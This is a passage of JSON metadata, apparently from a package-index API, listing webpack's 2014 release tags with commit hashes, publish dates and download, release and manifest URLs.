0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://re